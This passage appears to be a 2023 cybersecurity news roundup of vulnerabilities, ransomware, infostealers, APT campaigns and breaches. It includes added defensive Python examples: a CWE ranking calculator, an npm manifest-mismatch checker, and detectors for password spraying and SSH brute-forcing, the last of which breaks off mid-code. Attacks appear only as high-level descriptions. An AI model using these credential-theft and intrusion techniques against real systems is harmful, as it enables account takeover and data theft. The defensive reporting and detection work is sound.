Researchers are warning that over 130,000 photovoltaic monitoring and diagnostic systems are reachable from the public internet, leaving them exposed to attack. These systems play a crucial role in remote performance monitoring, troubleshooting, optimizing system efficiency, and enabling the remote management of renewable energy production units.

Researchers Uncover New Linux Kernel 'StackRot' Privilege Escalation Vulnerability

Researchers at Peking University recently disclosed details of a new flaw in the Linux Kernel that could enable a threat actor to elevate privileges on a targeted host. Dubbed StackRot, the flaw is being tracked as CVE-2023-3269 and impacts Linux versions 6.1 through 6.4. According to security researcher Ruihan Li, “As StackRot is a Linux kernel vulnerability found in the memory management subsystem, it affects almost all kernel configurations and requires minimal capabilities to trigger…However, it should be noted that maple nodes are freed using RCU callbacks, delaying the actual memory deallocation until after the RCU grace period. Consequently, exploiting this vulnerability is considered challenging.”

Cisco Warns of Bug That Lets Attackers Break Traffic Encryption

Yesterday, Cisco released an advisory warning customers of an unpatched vulnerability in the Cisco ACI Multi-Site CloudSec encryption feature of Cisco Nexus 9000 Series Fabric Switches in ACI mode that could be exploited by an unauthenticated remote attacker to read or modify intersite encrypted traffic. Tracked as CVE-2023-20185, the flaw received a CVSS score of 7.4, indicating high severity. According to Cisco, the vulnerability is due to an issue with the implementation of the ciphers used by the CloudSec encryption feature on affected switches.

Microsoft Investigates Outlook.com Bug Breaking Email Search

Microsoft is investigating an ongoing issue preventing Outlook[.]com users from searching their emails and triggering 401 exception errors. When searching, users see an error saying, "Sorry, something went wrong. Please try again later." "Our initial review of Outlook[.]com server logs, in parallel with HTTP Archive format (HAR) logs captured during an internal reproduction of impact, indicates 401 errors are occurring due to an exception when users attempt to perform the search," Microsoft says on the service health portal.

RedEnergy Stealer-as-a-Ransomware Employed in Attacks in the Wild

Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. The malware has the capabilities to steal information from various Internet browsers, but can also support ransomware activities. In this recent campaign, threat actors are masquerading as fake web browser updates to lure victims into installing the malware.

Hackers Target European Government Entities in SmugX Campaign

Since December 2022, a Chinese threat actor has been conducting a phishing campaign referred to as SmugX, which specifically targets embassies and foreign affairs ministries in the UK, France, Sweden, the Czech Republic, Hungary, and Slovakia. Security researchers at Check Point analyzed the attacks and identified similarities with previous activities carried out by the APT groups known as Mustang Panda and RedDelta.

New Tool Exploits Microsoft Teams Bug to Send Malware to Users

A member of U.S. Navy's red team has published a tool called TeamsPhisher that leverages an unresolved security issue in Microsoft Teams to bypass restrictions for incoming files from users outside of a targeted organization, the so-called external tenants. The tool exploits a problem highlighted last month by Max Corbridge and Tom Ellson of UK-based security services company Jumpsec, who explained how an attacker could easily go around Microsoft Teams' file-sending restraints to deliver malware from an external account.

Mexico-Based Hacker Targets Global Banks with Android Malware

An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed Neo_Net, according to security researcher Pol Thill.

Japan’s largest Port Stops Operations After Ransomware Attack

The Port of Nagoya, the largest and busiest port in Japan, has been targeted in a ransomware attack that is currently impacting the operation of its container terminals. The port accounts for roughly 10% of Japan's total trade volume. It operates 21 piers and 290 berths, and handles over two million containers and 165 million tons of cargo every year. The port is also used by the Toyota Motor Corporation, one of the world's largest automakers, to export most of its cars.

BlackCat Uses Malvertising to Push Backdoor

The BlackCat ransomware-as-a-service group is behind a threat activity cluster that distributes malware through ads bought against chosen search keywords. The operators gain a foothold in company networks via cloned web pages for applications such as WinSCP and SpyBoy. These cybercriminals hijack keywords to display malicious ads and lure unsuspecting users into downloading malware, a technique known as malvertising.

Blackcat Ransomware Pushes Cobalt Strike via WinSCP Search Ads

The ALPHV ransomware group, also known as the BlackCat, is engaging in malvertising activities to trick individuals into visiting counterfeit websites that closely resemble the legitimate WinSCP file-transfer application for Windows. However, these deceptive pages distribute installers infected with malicious software. WinSCP, a widely-used application for secure file transfer on Windows, is an open-source client and file manager supporting SFTP, FTP, S3, and SCP protocols. It boasts a significant user base, with approximately 400,000 weekly downloads from SourceForge alone. The BlackCat group is leveraging the WinSCP program as bait to potentially infiltrate the computers of system administrators, web administrators, and IT professionals, aiming to gain initial entry into valuable corporate networks.

New Windows Meduza Stealer Targets Tens of Crypto Wallets and Password Managers

A newly discovered information-stealing malware known as Meduza Stealer has been identified by researchers. The creators of this malware utilize advanced marketing tactics to promote its distribution. Meduza Stealer is designed to extract various browser-related data, such as login credentials, browsing history, and bookmarks, thereby compromising the victim’s browsing activities. Additionally, the malware targets specific extensions related to cryptocurrency wallets, password managers, and two-factor authentication (2FA). The authors of Meduza Stealer actively work on developing the malware in order to evade detection. However, no specific attacks have been attributed to this malware as of now.

TSMC Denies LockBit Hack as Ransomware Gang Demands $70 Million

Chipmaking giant TSMC (Taiwan Semiconductor Manufacturing Company) denied being hacked after the LockBit ransomware gang demanded $70 million not to release stolen data. TSMC is one of the world's largest semiconductor manufacturers, with its products used in a wide variety of devices, including smartphones, high-performance computing, IoT devices, automotive systems, and digital consumer electronics.

300,000+ Fortinet Firewalls Vulnerable to Critical FortiOS RCE Bug

Hundreds of thousands of FortiGate firewalls are vulnerable to a critical security issue identified as CVE-2023-27997, almost a month after Fortinet released an update that addresses the problem. The vulnerability is a remote code execution with a severity score of 9.8 out of 10 resulting from a heap-based buffer overflow problem in FortiOS, the operating system that connects all Fortinet networking components to integrate them in the vendor's Security Fabric platform.

Experts Detected a New Variant of North Korea-Linked RUSTBUCKET macOS Malware

Researchers from Elastic Security Labs have discovered a new variant of the RustBucket Apple macOS malware. In April, the security firm Jamf observed the North Korea-linked BlueNoroff APT group using this new malware. BlueNoroff operates under the control of the notorious Lazarus APT group, also linked to North Korea. The RustBucket malware enables the operators to download and execute different payloads. The attribution to BlueNoroff APT is based on similarities found in Kaspersky's analysis.

MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk?

MITRE recently published its list of the top 25 most dangerous software weaknesses for 2023. Every year, this list is calculated by analyzing public vulnerability data in the National Vulnerability Database for root cause mappings to CWE weaknesses for the previous two years. In total, 43,996 CVE entries were examined, with a score being assigned to each entry based on the prevalence and severity of the flaw.
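The ranking method described above, as an added worked example rather than MITRE's own code: each CVE record is mapped to its root-cause CWE, and each CWE's score combines how often it appears with how severe its CVEs are. The scoring model assumed here (frequency = share of mapped CVEs with that CWE, severity = mean CVSS base score divided by 10, score = frequency × severity × 100) is stated in the docstring as an assumption; the CVE records are constructed, not NVD data, and records without a CWE mapping are simply dropped.

```python
from collections import defaultdict

# Constructed sample records: (cve_id, cwe_id, cvss_base_score). Not real NVD
# data. A record with cwe_id None stands in for an entry that NVD could not
# map to a specific CWE.
SAMPLE_CVES = [
    ("CVE-2022-0001", "CWE-787", 9.8),
    ("CVE-2022-0002", "CWE-787", 7.5),
    ("CVE-2022-0003", "CWE-79", 6.1),
    ("CVE-2022-0004", "CWE-79", 5.4),
    ("CVE-2022-0005", "CWE-79", 6.1),
    ("CVE-2022-0006", "CWE-89", 9.8),
    ("CVE-2022-0007", "CWE-20", 7.5),
    ("CVE-2022-0008", "CWE-787", 8.8),
    ("CVE-2022-0009", None, 5.3),
]


def score_weaknesses(cves):
    """Return {cwe_id: {"count", "frequency", "severity", "score"}}.

    Assumed scoring model: frequency is the share of mapped CVEs whose root
    cause is the CWE, severity is the mean CVSS base score of those CVEs
    divided by 10, and score = frequency * severity * 100. Unmapped records
    are dropped before counting (an assumption about the input, not a
    description of MITRE's data cleaning).
    """
    mapped = [(cve, cwe, cvss) for cve, cwe, cvss in cves if cwe]
    total = len(mapped)
    by_cwe = defaultdict(list)
    for _, cwe, cvss in mapped:
        by_cwe[cwe].append(cvss)
    result = {}
    for cwe, scores in by_cwe.items():
        frequency = len(scores) / total
        severity = (sum(scores) / len(scores)) / 10
        result[cwe] = {
            "count": len(scores),
            "frequency": frequency,
            "severity": severity,
            "score": frequency * severity * 100,
        }
    return result


def rank_weaknesses(cves, n=25):
    """Top-n CWE ids by score, highest first: the shape of the published list."""
    scored = score_weaknesses(cves)
    return sorted(scored, key=lambda cwe: scored[cwe]["score"], reverse=True)[:n]


if __name__ == "__main__":
    scored = score_weaknesses(SAMPLE_CVES)
    for rank, cwe in enumerate(rank_weaknesses(SAMPLE_CVES), start=1):
        s = scored[cwe]
        print(f"{rank:>2}. {cwe:<8} count={s['count']} "
              f"freq={s['frequency']:.3f} sev={s['severity']:.3f} score={s['score']:.2f}")
```

The sample illustrates why the list is not simply sorted by CVSS: CWE-79 (cross-site scripting), with three medium-severity CVEs, outranks CWE-89 (SQL injection), which has a single 9.8 entry, because prevalence carries as much weight as severity.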

Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign

An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. ‘This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain,’ Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node.

New EarlyRAT Malware Linked to North Korean Andariel Hacking Group

Security analysts have discovered a previously undocumented remote access trojan (RAT) named 'EarlyRAT,' used by Andariel, a sub-group of the Lazarus North Korean state-sponsored hacking group. Andariel (aka Stonefly) is believed to be part of the Lazarus hacking group, and is known for employing the DTrack modular backdoor to collect information from compromised systems, such as browsing history, typed data (keylogging), screenshots, running processes, and more.

Clop's MOVEit Campaign Affects Over 16 Million Individuals

The victims of the Clop ransomware group's supply chain attack include a wide range of organizations, such as healthcare software firm Vitality Group International, Talcott Resolution Life Insurance Company, and several universities including Georgia, Johns Hopkins, Missouri, Rochester, and Southern Illinois. Government departments like the U.S. Department of Energy, Department of Agriculture, and Office of Personnel Management were also targeted.

Manifest Confusion Threat Undermines Trust in Entire NPM Registry

The lack of metadata validation in the npm registry, which is widely used by developers to download Javascript code, has raised concerns about potential cyber threats. Despite being the largest software registry globally, with 17 million developers relying on it, the registry fails to perform checks on package metadata.
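The check that the registry does not perform, as an added example that is not npm's code: compare the manifest the registry serves for a version against the `package.json` inside the tarball that `npm install` actually unpacks, and report the fields where they disagree. The package name, version, dependency and the tarball itself are constructed in memory for the illustration; the helper names are invented.

```python
import io
import json
import tarfile


def make_tarball(package_json: dict) -> bytes:
    """Build a minimal npm-style tarball (package/package.json) in memory.

    Constructed for this example; a real tarball carries the whole package tree.
    """
    data = json.dumps(package_json).encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name="package/package.json")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def manifest_from_tarball(tarball: bytes) -> dict:
    """Read package/package.json out of a tarball, the file the installer acts on."""
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:gz") as tar:
        member = tar.extractfile("package/package.json")
        if member is None:
            raise ValueError("tarball has no package/package.json")
        return json.loads(member.read().decode())


# Fields where a mismatch changes what gets installed or executed.
CHECKED_FIELDS = ("name", "version", "dependencies", "scripts")


def _normalize(manifest: dict, field: str):
    # A missing dependencies/scripts map means "none", so treat it as {}.
    value = manifest.get(field)
    if value is None and field in ("dependencies", "scripts"):
        return {}
    return value


def find_manifest_confusion(registry_manifest: dict, tarball: bytes) -> dict:
    """Return {field: (registry_value, tarball_value)} for each checked field that
    differs. An empty dict means the published metadata matches the code that ships."""
    actual = manifest_from_tarball(tarball)
    diffs = {}
    for field in CHECKED_FIELDS:
        published = _normalize(registry_manifest, field)
        shipped = _normalize(actual, field)
        if published != shipped:
            diffs[field] = (published, shipped)
    return diffs


# Constructed scenario: the registry document advertises a dependency-free
# package with no lifecycle scripts...
REGISTRY_MANIFEST = {"name": "tidy-strings", "version": "1.4.2",
                     "dependencies": {}, "scripts": {}}
# ...while the tarball that gets downloaded declares an extra dependency and a
# postinstall hook, neither visible to a scanner that reads only the registry.
TARBALL = make_tarball({
    "name": "tidy-strings",
    "version": "1.4.2",
    "dependencies": {"helper-lib": "^2.0.0"},
    "scripts": {"postinstall": "node setup.js"},
})


if __name__ == "__main__":
    print(find_manifest_confusion(REGISTRY_MANIFEST, TARBALL))
```

Tooling that builds its picture of a dependency tree from registry metadata alone will report this package as clean; the same check run against the tarball surfaces both the hidden dependency and the install-time hook.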

Critical Security Flaw in Social Login Plugin for WordPress Exposes Users' Accounts

Wordfence recently disclosed a critical flaw in miniOrange's Social Login and Register plugin for WordPress, which could be leveraged by a malicious threat actor to access any account on websites running the vulnerable plugin. Tracked as CVE-2023-2982 (CVSS score: 9.8), the flaw has been described as an authentication bypass flaw and impacts all versions of the plugin, including and prior to 7.6.4.

Linux version of Akira ransomware targets VMware ESXi servers

Operators behind the Akira ransomware have released a new Linux variant that is capable of encrypting VMware ESXi virtual machines. The Linux variant was discovered by malware analyst rivitna, who shared a sample of the new encryptor on VirusTotal last week. Analysis of the Linux encryptor shows a project name of 'Esxi_Build_Esxi6', indicating that it is specifically designed to target VMware ESXi servers.

Microsoft Fixes Windows Bug Causing File Explorer Freezes

Microsoft has resolved a Windows bug that was causing freezes in the File Explorer application. The issue primarily affected non-consumer environments and was observed in Windows 11 21H2/22H2 and Windows Server 2022. Users experienced freezes in File Explorer after installing Windows updates released since May 9th, 2023. Microsoft released an optional cumulative update (KB5027303) this month to address the issue for Windows 11 22H2 users, with a plan to make it available to all affected Windows users in the July Patch Tuesday cumulative updates.

CISA and NSA Help Organizations Defend Their CI/CD Environments

The Cybersecurity and Infrastructure Security Agency (CISA) and National Security Agency (NSA) published a joint Cybersecurity Information Sheet (CSI) titled "Defending Continuous Integration/Continuous Delivery Environments," which can help organizations improve their defenses in cloud implementations of development, security, and operations (DevSecOps). Specifically, the joint guide explains how to integrate security best practices into typical software development and operations (DevOps) CI/CD environments, regardless of the specific tools adopted.

CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million

Group-IB recently uncovered the operations of a scam ring dubbed CryptosLabs that has allegedly made €480 million in illegal profits by targeting French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate is known for impersonating well-known banks, fintechs, asset management firms, and crypto platforms, setting up scam infrastructure spanning over 350 domains hosted on more than 80 servers. According to researchers, the threat actors had been experimenting with different landing pages since 2015, ultimately launching their campaign around June 2018.

8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses

A ransomware threat called **8Base** that has been operating under the radar for over a year has been attributed to a ‘massive spike in activity’ in May and June 2023. ‘The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms,’ VMware Carbon Black researchers Deborah Snyder and Fae Carlisle [said](https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player) in a report. ‘8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries.’

EncroChat Bust Leads to 6,558 Criminals' Arrests and €900 Million Seizure

On Tuesday, Europol announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The operation was carried out by French and Dutch authorities which intercepted and analyzed over 115 million conversations made between approximately 60,000 users using the encrypted messaging platform.

Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

Researchers have recently detected a new info stealer known as ThirdEye, which exists in several variants, all designed to steal victims' data. During a preliminary analysis, FortiGuard Labs came across this malicious yet relatively unsophisticated info stealer while examining suspicious files. The researchers became suspicious after encountering a Russian archive file whose name translates to "time sheet" in English.

Hundreds of Devices Found Violating New CISA Federal Agency Directive

Censys researchers have discovered hundreds of Internet-exposed devices on the networks of U.S. federal agencies that have to be secured according to a recently issued CISA Binding Operational Directive. An analysis of the attack surfaces of more than 50 Federal Civilian Executive Branch (FCEB) organizations led to the discovery of more than 13,000 individual hosts exposed to Internet access, distributed across over 100 systems linked to FCEB agencies.

Anatsa Android Trojan Now Steals Banking Info From Users in US, UK

Researchers at ThreatFabric recently disclosed details of a new mobile campaign that has been pushing Anatsa, an Android banking trojan, to online banking customers in the U.S., the U.K., Germany, Austria, and Switzerland since March 2023. The malware is being distributed via the Play Store by masquerading as PDF viewer and editor apps and office suites, with over 30,000 installations in the last couple of months. Although ThreatFabric reported the malicious applications to Google, which removed them from the Play Store, the attackers were observed uploading new malware samples soon after under the guise of other applications.

New PindOS Javascript Dropper Deploys Bumblebee, Icedid Malware

Researchers have identified a novel malicious tool referred to as PindOS. This tool acts as a delivery mechanism for the Bumblebee and IcedID malware, which are commonly associated with ransomware attacks. PindOS operates as a JavaScript malware dropper, seemingly designed with the sole purpose of retrieving subsequent-stage payloads that ultimately deliver the perpetrators' final malicious payload.

CISA Releases Cloud Services Guidance and Resources

The Secure Cloud Business Applications (SCuBA) project provides guidance and capabilities to secure agencies’ cloud business application environments and protect federal information that is created, accessed, shared and stored in those environments. SCuBA will help secure federal civilian executive branch (FCEB) information assets stored within cloud environments through consistent, effective, modern, and manageable security configurations.

New Mockingjay Process Injection Technique Evades EDR Detection

A new process injection technique called "Mockingjay" has been discovered by researchers at cybersecurity firm Security Joes. This technique allows threat actors to bypass EDR (Endpoint Detection and Response) systems and execute malicious code on compromised systems without detection. Unlike traditional process injection methods, Mockingjay does not rely on commonly abused Windows API calls, special permissions, or memory allocation, making it more difficult to detect.

American Airlines, Southwest Airlines Disclose Data Breaches Affecting Pilots

American Airlines and Southwest Airlines, two of the largest airlines in the world, recently experienced data breaches caused by the hack of a third-party vendor called Pilot Credentials. The breach occurred on April 30, and both airlines were informed on May 3. The unauthorized individual gained access to Pilot Credentials' systems and stole documents containing information provided by pilot and cadet applicants. American Airlines reported that the breach affected 5,745 pilots and applicants, while Southwest reported a total of 3,009. The stolen information included personal details such as names, Social Security numbers, driver's license numbers, passport numbers, and more. Both airlines have terminated their relationship with the vendor and are directing applicants to self-managed internal portals. They have also notified law enforcement and are cooperating with investigations.

MOVEit Breach Impacts Genworth, Calpers as Data for 3.2 Million Exposed

PBI Research Services has experienced a data breach, resulting in the disclosure of sensitive information for approximately 4.75 million individuals. This breach occurred during the recent series of data-theft attacks targeting MOVEit Transfer. The attacks, initiated by the Clop ransomware gang, commenced on May 27th, 2023. Exploiting a previously unknown vulnerability in MOVEit Transfer, the gang proceeded to extract data from numerous companies, including PBI and three of its clients. In recent days, the Clop gang has adopted an extortion strategy of gradually revealing the names of affected organizations on its data leak site. The tactic aims to exert pressure on victims, compelling them to meet the gang's ransom demands.

Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers

In a series of Twitter posts last week, Microsoft stated that it has observed an uptick in credential-stealing attacks from Midnight Blizzard (aka Nobelium, APT29, Cozy Bear, Iron Hemlock, and The Dukes), a notorious Russian state-affiliated hacker group that was behind the 2020 SolarWinds attack. The latest intrusions are using a variety of password spray, brute force, and token theft techniques, with the group also conducting session replay attacks to gain initial access to cloud resources leveraging stolen sessions. Targets highlighted by Microsoft include governments, IT service providers, NGOs, the defense industry, and critical manufacturing.
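The spray and brute-force patterns named above, as an added detection example that is not Microsoft's code or telemetry: a password spray tries one or two passwords against many accounts from one source so that no single account trips a lockout, which is exactly the shape a per-source view of failed sign-ins can catch. The sign-in log below is constructed (TEST-NET addresses, invented users), the log format is invented, and the thresholds are illustrative tuning knobs rather than values from the Microsoft posts.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sign-in log (not real telemetry), one event per line:
#   "<utc timestamp> <source ip> <user> <result>"
# 203.0.113.7 tries a password against five accounts and then gets into a
# sixth; 198.51.100.9 hammers a single account; 192.0.2.5 is an ordinary login.
SAMPLE_LOG = """\
2023-06-20T10:00:01Z 203.0.113.7 alice FAILURE
2023-06-20T10:00:04Z 203.0.113.7 bob FAILURE
2023-06-20T10:00:09Z 203.0.113.7 carol FAILURE
2023-06-20T10:00:15Z 203.0.113.7 dave FAILURE
2023-06-20T10:00:21Z 203.0.113.7 erin FAILURE
2023-06-20T10:00:30Z 203.0.113.7 frank SUCCESS
2023-06-20T10:05:00Z 198.51.100.9 bob FAILURE
2023-06-20T10:05:02Z 198.51.100.9 bob FAILURE
2023-06-20T10:05:04Z 198.51.100.9 bob FAILURE
2023-06-20T10:05:06Z 198.51.100.9 bob FAILURE
2023-06-20T10:05:08Z 198.51.100.9 bob FAILURE
2023-06-20T10:05:10Z 198.51.100.9 bob FAILURE
2023-06-20T10:07:00Z 192.0.2.5 alice SUCCESS
"""


def parse_log(text):
    """Parse the constructed format into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "ip": ip, "user": user, "result": result})
    return events


def detect_password_spray(text, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Flag source IPs that fail against many distinct users with few attempts each.

    For every failure from an IP, look at the failures that follow it within
    `window`; a spray shows up as many users, low attempts per user. A success
    from the same IP inside that window is the sign the spray found a password.
    """
    by_ip = defaultdict(list)
    for e in parse_log(text):
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "FAILURE"]
        for i, start in enumerate(failures):
            end = start["ts"] + window
            in_window = [f for f in failures[i:] if f["ts"] <= end]
            per_user = Counter(f["user"] for f in in_window)
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits = sorted({e["user"] for e in evs
                               if e["result"] == "SUCCESS" and start["ts"] <= e["ts"] <= end})
                findings.append({"ip": ip, "users_targeted": len(per_user),
                                 "window_start": start["ts"], "successes": hits})
                break  # one finding per source is enough for triage
    return findings


def detect_brute_force(text, min_failures=5):
    """Flag (ip, user) pairs with many failures: the noisy single-account pattern
    that spraying is designed to avoid."""
    counts = Counter((e["ip"], e["user"])
                     for e in parse_log(text) if e["result"] == "FAILURE")
    return [(ip, user, n) for (ip, user), n in counts.items() if n >= min_failures]


if __name__ == "__main__":
    print(detect_password_spray(SAMPLE_LOG))
    print(detect_brute_force(SAMPLE_LOG))
```

Note what each rule misses: the brute-force rule never sees 203.0.113.7, because no account there fails more than once, and the spray rule never sees 198.51.100.9, because only one user is involved. Both views are needed, and a spray finding whose `successes` list is non-empty is the one to act on first, since the attacker now holds a valid credential.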

China-linked APT Group VANGUARD PANDA Uses a New Tradecraft in Recent Attacks

CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using novel tradecraft to gain initial access to target networks. The Volt Typhoon group has been active since at least mid-2021 and has carried out cyber operations against critical infrastructure. In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors.

Suncor Energy Cyberattack Impacts Petro-Canada Gas Stations

Over the weekend, Suncor, one of Canada’s largest synthetic crude producers, disclosed it suffered from a cyberattack, stating that it is working on resolving the incident and that some transactions with customers and suppliers may have been impacted. Although no additional details were reported in Suncor’s notice, Petro-Canada, a subsidiary of Suncor that operates 1,500 gas stations across Canada, stated it is facing technical issues, preventing customers from paying with credit cards or rewards points. According to a post on Twitter, the company warned customers that they cannot currently log in to their accounts via the app or website and apologized for the inconvenience caused. This outage also prevents earning points when refueling at the company's gas stations.

Mirai Botnet Targets 22 Flaws in D-Link, Zyxel, Netgear Devices

Researchers from Palo Alto Networks' Unit 42 have detected a modified version of the Mirai botnet that is actively exploiting nearly 20 vulnerabilities. The primary objective of this botnet is to compromise devices manufactured by D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The compromised devices are then used to launch distributed denial-of-service (DDoS) attacks.

Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware

Cybersecurity firm Deep Instinct has uncovered a new JavaScript dropper, dubbed PindOS, that is being used to deliver next-stage payloads like Bumblebee and IcedID, both of which are loaders that have also been leveraged to deploy other malware on hosts, including ransomware. Bumblebee, notably, is a replacement for another loader called BazarLoader, which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including those behind Conti, Emotet, and IcedID.

IDOR in Microsoft Teams Allows for External Tenants to Introduce Malware

Security researchers from Jumpsec have discovered a vulnerability in Microsoft Teams that enables attackers to deliver malware directly to employees' inboxes. The bug allows external users to send malicious payloads that appear as downloadable files. By combining this vulnerability with social engineering tactics, attackers can increase the success rate of their attacks. This method bypasses anti-phishing security controls and takes advantage of the trust employees have in messages received through Microsoft Teams. This vulnerability affects every organization using Teams in the default configuration.

RedEyes Group Wiretapping Individuals

“RedEyes, a state-sponsored APT group also known as APT37, ScarCruft, and Reaper, has been identified as targeting individuals such as North Korean defectors, human rights activists, and university professors. Their objective is to monitor the lives of specific individuals. In May 2023, AhnLab Security Emergency response Center (ASEC) discovered RedEyes distributing and utilizing an Infostealer with wiretapping capabilities and a GoLang-based backdoor that exploits the Ably platform. The backdoor allowed the threat actor to send commands through the Ably service, with the API key value required for communication stored in a GitHub repository. This key value allowed anyone with knowledge of it to subscribe to the threat actor's channel”

404 TDS Phishing Campaign: Truebot, FlawedGrace, and Cobalt Strike Intrusion Revealed

During a DFIR investigation of an intrusion in May 2023, responders observed the deployment of Truebot, Cobalt Strike, FlawedGrace (also known as GraceWire and BARBWIRE), and, finally, the MBR Killer wiper. The threat actors executed their attack swiftly, exfiltrating data and rendering numerous systems inoperable with the wiper within 29 hours of gaining initial access.

Critical Flaw Found in WordPress Plugin for WooCommerce Used by 30,000 Websites

A critical security flaw has been disclosed in the WordPress "Abandoned Cart Lite for WooCommerce" plugin that's installed on more than 30,000 websites. ‘This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met,’ Defiant's Wordfence said in an advisory. Tracked as CVE-2023-2986, the shortcoming has been rated 9.8 out of 10 for severity on the CVSS scoring system.

UPS Discloses Data Breach After Exposed Customer Info Used in SMS Phishing

Multinational company UPS is notifying customers in Canada that certain personal details could have been compromised through its online package tracking tools, potentially leading to their misuse in phishing attempts. The communication sent by UPS Canada titled “An Update from UPS: Combatting Phishing and Smishing,” appears to be initially aimed at cautioning customers about the risk associated with phishing. However, the communication is, in fact, a notification of a data breach. UPS Canada discreetly includes a disclosure within the message, revealing that they have been receiving reports of SMS phishing messages containing recipients’ names and address information.

Apple Fixes Zero-Days Used to Deploy Triangulation Spyware Via iMessage

Apple recently addressed three zero-day vulnerabilities that were exploited in attacks to install spyware on iPhones via iMessage zero-click exploits. Below is a list of the CVEs:

  • CVE-2023-32434: A kernel integer overflow was addressed with improved input validation.
  • CVE-2023-32435: A memory corruption issue in Apple WebKit was addressed with improved state management.
  • CVE-2023-32439: A type confusion issue in WebKit was addressed with improved checks.

    The first two flaws were uncovered by researchers at Kaspersky, Georgy Kucherin, Leonid Bezvershenko, and Boris Larin. According to Kaspersky, the vulnerabilities have been exploited in an ongoing campaign dubbed Operation Triangulation, which has been active since 2019.

    APT37 Hackers Deploy New FadeStealer Eavesdropping Malware

    The North Korean APT37 hacking group, also known as ScarCruft, Reaper, or RedEyes, has recently deployed a new information-stealing malware called "FadeStealer." This malware includes a wiretapping feature, allowing the threat actors to eavesdrop and record from victims' microphones. APT37 has a history of conducting cyber espionage attacks aligned with North Korean interests, targeting North Korean defectors, educational institutions, and EU-based organizations.

    Exploit Released for Cisco AnyConnect Bug Giving SYSTEM Privileges

    A proof-of-concept exploit code has been released for a high-severity vulnerability in Cisco Secure Client Software for Windows, previously known as AnyConnect Secure Mobility Client. This flaw, tracked as CVE-2023-20178, allows authenticated attackers to escalate privileges to the SYSTEM account, which is used by the Windows operating system. The vulnerability can be exploited without user interaction and takes advantage of a specific function in the Windows installer process.

    New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

    A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. ‘The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code,’ security researchers Joie Salvio and Roy Tay said.

    Zyxel Warns of Critical Command Injection Flaw in NAS Devices

    Zyxel recently published security updates to address a critical command injection vulnerability impacting its Network Attached Storage (NAS) devices, warning customers to update their firmware. Tracked as CVE-2023-27992, the vulnerability is due to a pre-authentication command injection problem that could enable an unauthenticated attacker to execute operating system commands on the impacted device via specially crafted HTTP requests.

    Hackers Infect Linux SSH Servers With Tsunami Botnet Malware

    An unidentified malicious entity is employing brute-force techniques to gain unauthorized access to Linux SSH servers, enabling the installation of various forms of malicious software. The malware includes the Tsunami DDoS bot, ShellBot, log cleaners, tools for privilege escalation, and an XMRig coin miner designed to mine Monero. SSH (Secure Shell) is a secure and encrypted network communication protocol used for remote administration of Linux devices. It facilitates activities such as executing commands, modifying configurations, updating software, and resolving issues for network administrators.
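The brute-force-then-install pattern described above leaves a recognizable trace in sshd logs: a burst of failed logins from one source followed by an accepted login from the same source. The following detector is an added example, not code from the article or from the reported research; the auth.log lines it parses are constructed, and the threshold and window values are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in auth.log (syslog) format; the year is not
# present in syslog timestamps, so parse() takes it as a parameter.
SAMPLE_AUTH_LOG = """\
Jun 20 03:14:01 host1 sshd[2101]: Failed password for root from 203.0.113.7 port 51000 ssh2
Jun 20 03:14:02 host1 sshd[2102]: Failed password for invalid user admin from 203.0.113.7 port 51001 ssh2
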